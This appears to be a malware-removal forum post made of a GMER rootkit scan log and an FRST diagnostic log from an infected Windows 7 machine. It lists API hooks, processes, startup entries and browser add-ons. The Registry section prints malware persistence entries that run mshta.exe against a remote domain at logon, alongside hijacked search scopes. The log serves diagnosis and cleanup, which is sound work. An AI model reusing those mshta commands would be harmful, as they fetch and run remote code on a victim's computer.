.text C:\Program Files\Internet Explorer\iexplore.exe[2384] ole32.dll!CoImpersonateClient + 51 77515228 7 Bytes JMP 03A4083A
.text C:\Program Files\Internet Explorer\iexplore.exe[2384] ole32.dll!OleLoadFromStream 7752988B 5 Bytes JMP 3E3E7CFF C:\WINDOWS\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[3864] ntdll.dll!NtMapViewOfSection 7C90D51E 5 Bytes JMP 03A40048
.text C:\Program Files\Internet Explorer\iexplore.exe[3864] ntdll.dll!NtSetInformationProcess 7C90DC9E 5 Bytes JMP 03A4012A
.text C:\Program Files\Internet Explorer\iexplore.exe[3864] kernel32.dll!VirtualProtectEx + 6E 7C801ACF 7 Bytes JMP 03A40676
.text C:\Program Files\Internet Explorer\iexplore.exe[3864] kernel32.dll!ReadProcessMemory + 3E 7C80220E 7 Bytes JMP 03A403D0
.text C:\Program Files\Internet Explorer\iexplore.exe[3864] kernel32.dll!lstrlenW + 43 7C809AEC 7 Bytes JMP 03A40594
.text C:\Program Files\Internet Explorer\iexplore.exe[3864] kernel32.dll!CreateRemoteThread + 206 7C810702 7 Bytes JMP 03A402EE
.text C:\Program Files\Internet Explorer\iexplore.exe[3864] kernel32.dll!GetVersionExA + D3 7C810903 7 Bytes JMP 03A40758
.text C:\Program Files\Internet Explorer\iexplore.exe[3864] kernel32.dll!GetProcessHandleCount + 35 7C862F2F 7 Bytes JMP 03A404B2
.text C:\Program Files\Internet Explorer\iexplore.exe[3864] USER32.dll!DialogBoxParamW 7E4247AB 5 Bytes JMP 3E215545 C:\WINDOWS\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[3864] USER32.dll!SetWindowsHookExW 7E42820F 5 Bytes JMP 3E2E9B99 C:\WINDOWS\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[3864] USER32.dll!CallNextHookEx 7E42B3C6 5 Bytes JMP 3E2DD1CD C:\WINDOWS\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[3864] USER32.dll!CreateWindowExW 7E42D0A3 5 Bytes JMP 3E2EDC24 C:\WINDOWS\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[3864] USER32.dll!UnhookWindowsHookEx 7E42D5F3 5 Bytes JMP 3E2546FC C:\WINDOWS\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[3864] USER32.dll!DialogBoxIndirectParamW 7E432072 5 Bytes JMP 3E3E7997 C:\WINDOWS\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[3864] USER32.dll!MessageBoxIndirectA 7E43A082 5 Bytes JMP 3E3E78C9 C:\WINDOWS\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[3864] USER32.dll!DialogBoxParamA 7E43B144 5 Bytes JMP 3E3E7934 C:\WINDOWS\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[3864] USER32.dll!MessageBoxExW 7E450838 5 Bytes JMP 3E3E779A C:\WINDOWS\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[3864] USER32.dll!MessageBoxExA 7E45085C 5 Bytes JMP 3E3E77FC C:\WINDOWS\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[3864] USER32.dll!DialogBoxIndirectParamA 7E456D7D 5 Bytes JMP 3E3E79FA C:\WINDOWS\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[3864] USER32.dll!MessageBoxIndirectW 7E4664D5 5 Bytes JMP 3E3E785E C:\WINDOWS\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[3864] ole32.dll!CreateBindCtx + B5F 774FF177 7 Bytes JMP 03A4091C
.text C:\Program Files\Internet Explorer\iexplore.exe[3864] ole32.dll!CoCreateInstance 774FF1D4 5 Bytes JMP 3E2EDC80 C:\WINDOWS\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[3864] ole32.dll!CoImpersonateClient + 51 77515228 7 Bytes JMP 03A4083A
.text C:\Program Files\Internet Explorer\iexplore.exe[3864] ole32.dll!OleLoadFromStream 7752988B 5 Bytes JMP 3E3E7CFF C:\WINDOWS\system32\IEFRAME.dll

---- Devices - GMER 2.1 ----

AttachedDevice \Driver\Tcpip \Device\Ip SYMTDI.SYS
AttachedDevice \Driver\Tcpip \Device\Tcp SYMTDI.SYS
AttachedDevice \Driver\Tcpip \Device\Udp SYMTDI.SYS
AttachedDevice \Driver\Tcpip \Device\RawIp SYMTDI.SYS
AttachedDevice \FileSystem\Fastfat \Fat fltmgr.sys

---- Registry - GMER 2.1 ----

Reg HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\9040211900063D11C8EF10054038389C\Usage@ProductFiles 1151798115
Reg HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\9040211900063D11C8EF10054038389C\Usage@ProductNonBootFiles 1151795817
Reg HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\9040211900063D11C8EF10054038389C\Usage@WORDFiles 1151801945
Reg HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\9040211900063D11C8EF10054038389C\Usage@ASSISTANTFiles 1151795995

---- EOF - GMER 2.1 ----

Attached Images

	System Mechanic - Pic.JPG (146.8 KB)
	System Config.JPG (60.8 KB)

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 10-05-2014
Ran by AIR (administrator) on AIR-HP on 10-05-2014 21:43:28
Running from C:\Users\AIR\Desktop
Platform: Windows 7 Home Premium Service Pack 1 (X64) OS Language: 0C04
Internet Explorer Version 11
Boot Mode: Normal

The only official download link for FRST:
Download link for 32-Bit version: http://www.bleepingcomputer.com/down...an-tool/dl/81/
Download link for 64-Bit Version: http://www.bleepingcomputer.com/down...an-tool/dl/82/
Download link from any site other than Bleeping Computer is unpermitted or outdated.
See tutorial for FRST: http://www.geekstogo.com/forum/topic...ery-scan-tool/

==================== Processes (Whitelisted) =================

(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2014\avgrsa.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2014\avgcsrva.exe
(AMD) C:\Windows\System32\atiesrxx.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Alipay Inc. ) C:\Program Files (x86)\alipay\alieditplus\AlipaySecSvc.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2014\avgidsagent.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2014\avgwdsvc.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office 15\ClientX64\officeclicktorun.exe
(Nero AG) C:\Program Files (x86)\Motorola Media Link\Lite\NServiceEntry.exe
() C:\Program Files\Hewlett-Packard\HP Power Assistant\HPPA_Service.exe
(Hewlett-Packard Company) C:\Program Files\Hewlett-Packard\HP Client Services\HPClientServices.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\IME14\SHARED\IMEDICTUPDATE.EXE
(Motorola Mobility LLC) C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotoHelperService.exe
(PDF Complete Inc) C:\Program Files (x86)\PDF Complete\pdfsvc.exe
(Motorola) C:\Program Files (x86)\Motorola\MotForwardDaemon\ForwardDaemon.exe
() C:\Program Files (x86)\EPSON_P2B\Printer Software\Status Monitor\seksmdb.exe
(SoftEther Project at University of Tsukuba, Japan.) C:\Program Files\SoftEther VPN Client\vpnclient_x64.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2014\avgnsa.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2014\avgemca.exe
(Motorola Mobility LLC) C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotoHelperAgent.exe
(阿里巴巴(中国)有限公司) C:\Program Files (x86)\alipay\SafeTransaction\TaobaoProtect.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Alipay Inc. ) C:\Program Files (x86)\alipay\SafeTransaction\Alipaybsm.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Hewlett-Packard) C:\Program Files (x86)\Hewlett-Packard\HP Odometer\hpsysdrv.exe
(SoftEther Project at University of Tsukuba, Japan.) C:\Program Files\SoftEther VPN Client\vpnclient_x64.exe
(Microsoft Corporation) C:\Windows\System32\alg.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\Office14\MSOSYNC.EXE
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudServices.exe
(Motorola Mobility Inc.) C:\Program Files (x86)\Motorola Mobility\MotoCast\MotoCast.exe
(SoftEther Project at University of Tsukuba, Japan.) C:\Program Files\SoftEther VPN Client\vpncmgr_x64.exe
(SEIKO EPSON CORPORATION) C:\Program Files (x86)\EPSON_P2B\Printer Software\Launcher\selaunch.exe
(Dropbox, Inc.) C:\Users\AIR\AppData\Roaming\Dropbox\bin\Dropbox.exe
() C:\Program Files (x86)\EPSON_P2B\Printer Software\Status Monitor\seksmpl.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2014\avgui.exe
(Adobe Systems Inc.) C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\acrotray.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Apple Inc.) C:\Program Files (x86)\iTunes\iTunesHelper.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office 15\root\office15\ONENOTEM.EXE
() C:\Program Files (x86)\EPSON_P2B\Printer Software\Status Monitor\seksmW.exe
() C:\Program Files (x86)\EPSON_P2B\Printer Software\Status Monitor\seksmwj.exe
() C:\Program Files (x86)\Motorola Mobility\MotoCast\bin\MotoCast-thumbnailer.exe
(Microsoft Corporation) C:\Windows\System32\mshta.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(ATI Technologies Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSA_Service.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE
(Microsoft Corporation) C:\Windows\System32\prevhost.exe
() C:\Users\AIR\Desktop\63r8jur5.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AcroRd32.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AcroRd32.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXE
(WinZip Computing, S.L.) C:\Program Files\WinZip\WzPreviewer64.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AcroRd32.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AcroRd32.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe


==================== Registry (Whitelisted) ==================

HKLM\...\Run: [hpsysdrv] => c:\program files (x86)\hewlett-packard\HP odometer\hpsysdrv.exe [62768 2008-11-21] (Hewlett-Packard)
HKLM\...\Run: [IME14 CHT Setup] => C:\Program Files\Common Files\Microsoft Shared\IME14\SHARED\IMEKLMG.EXE [110896 2012-03-14] (Microsoft Corporation)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [444904 2012-09-20] (Adobe Systems Incorporated)
HKLM\...\Run: [SoftEther VPN Client UI Helper] => C:\Program Files\SoftEther VPN Client\vpnclient_x64.exe [4178488 2013-11-24] (SoftEther Project at University of Tsukuba, Japan.)
HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [98304 2010-11-24] (Advanced Micro Devices, Inc.)
HKLM-x32\...\Run: [PDF Complete] => C:\Program Files (x86)\PDF Complete\pdfsty.exe [656920 2011-02-01] (PDF Complete Inc)
HKLM-x32\...\Run: [LauncherMX14NF] => C:\Program Files (x86)\EPSON_P2B\Printer Software\Launcher\selaunch.exe [2268832 2012-07-02] (SEIKO EPSON CORPORATION)
HKLM-x32\...\Run: [MX14NF RUN] => C:\Program Files (x86)\EPSON_P2B\Printer Software\Status Monitor\seksmRun.exe [363168 2012-07-11] ()
HKLM-x32\...\Run: [StatusAutoRunMX14NF] => C:\Program Files (x86)\EPSON_P2B\Printer Software\Status Monitor\seksmpl.exe [3988128 2012-07-11] ()
HKLM-x32\...\Run: [IME14 CHT Setup] => C:\Program Files (x86)\Common Files\microsoft shared\IME14\SHARED\IMEKLMG.EXE [81200 2012-03-14] (Microsoft Corporation)
HKLM-x32\...\Run: [BCSSync] => C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe [89184 2012-11-05] (Microsoft Corporation)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959904 2013-11-22] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [43848 2014-02-06] (Apple Inc.)
HKLM-x32\...\Run: [AVG_UI] => C:\Program Files (x86)\AVG\AVG2014\avgui.exe [5180432 2014-04-06] (AVG Technologies CZ, s.r.o.)
HKLM-x32\...\Run: [AdobeCS6ServiceManager] => C:\Program Files (x86)\Common Files\Adobe\CS6ServiceManager\CS6ServiceManager.exe [1075296 2013-04-25] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [Acrobat Assistant 8.0] => C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\Acrotray.exe [3478392 2013-09-05] (Adobe Systems Inc.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [254336 2013-07-02] (Oracle Corporation)
HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [152392 2014-02-06] (Apple Inc.)
HKLM\...\RunOnce: [NCPluginUpdater] - "C:\Program Files (x86)\Hewlett-Packard\HP Health Check\ActiveCheck\product_line\NCPluginUpdater.exe" Update [21720 2014-04-22] (Hewlett-Packard)
HKU\S-1-5-21-879570740-1523932123-957937009-1000\...\Run: [OfficeSyncProcess] => C:\Program Files (x86)\Microsoft Office\Office14\MSOSYNC.EXE [720064 2013-04-22] (Microsoft Corporation)
HKU\S-1-5-21-879570740-1523932123-957937009-1000\...\Run: [iCloudServices] => C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudServices.exe [59720 2013-11-20] (Apple Inc.)
HKU\S-1-5-21-879570740-1523932123-957937009-1000\...\Run: [Facebook Update] => C:\Users\AIR\AppData\Local\Facebook\Update\FacebookUpdate.exe [138096 2013-03-24] (Facebook Inc.)
HKU\S-1-5-21-879570740-1523932123-957937009-1000\...\Run: [MotoCast] => C:\Program Files (x86)\Motorola Mobility\MotoCast\MotoLauncher.lnk [2013 2013-07-21] ()
HKU\S-1-5-21-879570740-1523932123-957937009-1000\...\Run: [Google Update] => C:\Users\AIR\AppData\Local\Google\Update\GoogleUpdate.exe [116648 2013-07-13] (Google Inc.)
HKU\S-1-5-21-879570740-1523932123-957937009-1000\...\Run: [SystemBoot9o7OmIlsVd1uwfjSblhag36mw1fmoWHv] => mshta.exe http://dwy.toyncise.net/reg2.php?ccc...w1fmoWHv&log=1
HKU\S-1-5-21-879570740-1523932123-957937009-1000\...\Run: [RegWrite9o7OmIlsVd1uwfjSblhag36mw1fmoWHv] => mshta.exe http://dwy.toyncise.net/set_inf2.php...hag36mw1fmoWHv
HKU\S-1-5-21-879570740-1523932123-957937009-1000\...\RunOnce: [RegWrite9o7OmIlsVd1uwfjSblhag36mw1fmoWHv] - mshta.exe http://dwy.toyncise.net/set_inf2.php...hag36mw1fmoWHv
HKU\S-1-5-21-879570740-1523932123-957937009-1000\...\Policies\system: [LogonHoursAction] 2
HKU\S-1-5-21-879570740-1523932123-957937009-1000\...\Policies\system: [DontDisplayLogonHoursWarnings] 1
HKU\S-1-5-21-879570740-1523932123-957937009-1000\...\MountPoints2: H - H:\HTC_Sync_Manager_PC.exe
HKU\S-1-5-21-879570740-1523932123-957937009-1000\...\MountPoints2: {4fc53354-f18b-11e2-a623-00ac0597543e} - G:\Setup.exe
HKU\S-1-5-21-879570740-1523932123-957937009-1000\...\MountPoints2: {5dad2d0e-b107-11e3-a0a0-00ac0597543e} - H:\HTC_Sync_Manager_PC.exe
HKU\S-1-5-21-879570740-1523932123-957937009-1000\...\MountPoints2: {ae55cb71-762d-11e2-893a-e06995db3242} - G:\setup.exe -a
HKU\S-1-5-21-879570740-1523932123-957937009-1000\...\MountPoints2: {ca36bf81-c86a-11e3-b715-00ac0597543e} - H:\HTC_Sync_Manager_PC.exe
Startup: C:\Users\AIR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk
ShortcutTarget: Dropbox.lnk -> C:\Users\AIR\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
Startup: C:\Users\AIR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\傳送至 OneNote.lnk
ShortcutTarget: 傳送至 OneNote.lnk -> C:\Program Files\Microsoft Office 15\root\office15\ONENOTEM.EXE (Microsoft Corporation)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\SoftEther VPN Client Manager Startup.lnk
ShortcutTarget: SoftEther VPN Client Manager Startup.lnk -> C:\Program Files\SoftEther VPN Client\vpncmgr_x64.exe (SoftEther Project at University of Tsukuba, Japan.)
GroupPolicyUsers\S-1-5-21-879570740-1523932123-957937009-1003\User: Group Policy restriction detected <======= ATTENTION

==================== Internet (Whitelisted) ====================

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://home.netvigator.com/~winway93/
HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://hk.msn.com/?ocid=OIE9HP
SearchScopes: HKCU - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKCU - {8E7EAC92-D4AC-420A-8B51-77545AE61991} URL = http://websearch.ask.com/redirect?client=ie&tb=ORJ&o=&src=kw&q={searchTerms}&locale=&apn_ptnrs=U3&ap n_dtid=OSJ000YYHK&apn_uid=C614F35D-D17F-4593-B723-D54AB06BEDBB&apn_sauid=E9889AB2-432E-44C5-A6B6-D10FE1596A18
SearchScopes: HKCU - {BE57C649-AC9B-4C19-BA82-DC400427FB85} URL = http://search.conduit.com/ResultsExt.aspx?q={searchTerms}&SearchSource=4&ctid=CT3289075&CUI=UN3338889 1595962207&UM=1
BHO: Lync Browser Helper - {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\OCHelper.dll (Microsoft Corporation)
BHO: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO: Windows Live ID Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
BHO: Adobe Acrobat Create PDF Helper - {AE7CD045-E861-484f-8273-0445EE161910} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\x64\AcroIEFavClient.dll (Adobe Systems Incorporated)
BHO: Office Document Cache Handler - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\URLREDIR.DLL (Microsoft Corporation)
BHO: Microsoft SkyDrive Pro Browser Helper - {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} - C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\GROOVEEX.DLL (Microsoft Corporation)
BHO: Adobe Acrobat Create PDF from Selection - {F4971EE7-DAA0-4053-9964-665D8EE6A077} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\x64\AcroIEFavClient.dll (Adobe Systems Incorporated)
BHO-x32: Lync Browser Helper - {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - C:\Program Files\Microsoft Office 15\root\Office15\OCHelper.dll (Microsoft Corporation)
BHO-x32: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO-x32: Windows Live ID Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
BHO-x32: Adobe Acrobat Create PDF Helper - {AE7CD045-E861-484f-8273-0445EE161910} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
BHO-x32: Office Document Cache Handler - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files\Microsoft Office 15\root\Office15\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: Microsoft SkyDrive Pro Browser Helper - {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} - C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
BHO-x32: Adobe Acrobat Create PDF from Selection - {F4971EE7-DAA0-4053-9964-665D8EE6A077} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
Toolbar: HKLM - Adobe Acrobat Create PDF Toolbar - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\x64\AcroIEFavClient.dll (Adobe Systems Incorporated)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
Toolbar: HKLM-x32 - Adobe Acrobat Create PDF Toolbar - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
Toolbar: HKCU - No Name - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - No File
DPF: HKLM-x32 {233C1507-6A77-46A4-9443-F871F945D258} http://download.macromedia.com/pub/s...irector/sw.cab
DPF: HKLM-x32 {3A2C8BC3-5B68-4AE5-81D6-6DC378708F3E} https://ibs.ncbchina.cn/perbank/cab/PassGuardCtrl.cab
DPF: HKLM-x32 {D27CDB6E-AE6D-11CF-96B8-444553540000} http://fpdownload.adobe.com/pub/shoc...sh/swflash.cab
Handler-x32: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office 15\root\Office15\MSOSB.DLL (Microsoft Corporation)
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1

FireFox:
========
FF Plugin: @adobe.com/FlashPlayer - C:\Windows\system32\Macromed\Flash\NPSWF64_13_0_0_206.dll ()
FF Plugin: @alipay.com/npAliSecCtrl - C:\Windows\SysWOW64\aliedit\3.7.0.0\npAliSecCtrl64.dll (Alipay.com Inc. )
FF Plugin: @microsoft.com/GENUINE - disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 - c:\Program Files\Microsoft Silverlight\5.1.30214.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 - C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin: adobe.com/AdobeAAMDetect - C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll (Adobe Systems)
FF Plugin: adobe.com/AdobeExManDetect - C:\Program Files (x86)\Adobe\Adobe Extension Manager CS6\Win64Plugin\npAdobeExManDetectX64.dll (Adobe Systems)
FF Plugin-x32: @adobe.com/FlashPlayer - C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_13_0_0_206.dll ()
FF Plugin-x32: @adobe.com/ShockwavePlayer - C:\Windows\SysWOW64\Adobe\Director\np32dsw_1207148.dll (Adobe Systems, Inc.)
FF Plugin-x32: @alibaba.com/npwangwang;version=1.0 - C:\Program Files (x86)\AliWangWang\8.00.05C\npwangwang.dll ( )
FF Plugin-x32: @alipay.com/npalidcp - C:\Windows\system32\aliedit\3.7.0.0\npalidcp.dll No File
FF Plugin-x32: @alipay.com/npaliedit - C:\Windows\system32\aliedit\3.7.0.0\npaliedit.dll No File
FF Plugin-x32: @alipay.com/npAliSecCtrl - C:\Windows\system32\aliedit\3.7.0.0\npAliSecCtrl.dll No File
FF Plugin-x32: @alipay.com/NPComBrg701,version=1.0.2011.701 - C:\Windows\system32\itruscert\NPComBrg701.dll No File
FF Plugin-x32: @Apple.com/iTunes,version=1.0 - C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @Google.com/GoogleEarthPlugin - C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll (Google)
FF Plugin-x32: @java.com/DTPlugin,version=10.51.2 - C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.51.2 - C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE - disabled No File
FF Plugin-x32: @microsoft.com/Lync,version=15.0 - C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll (Microsoft Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 - c:\Program Files (x86)\Microsoft Silverlight\5.1.30214.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 - C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
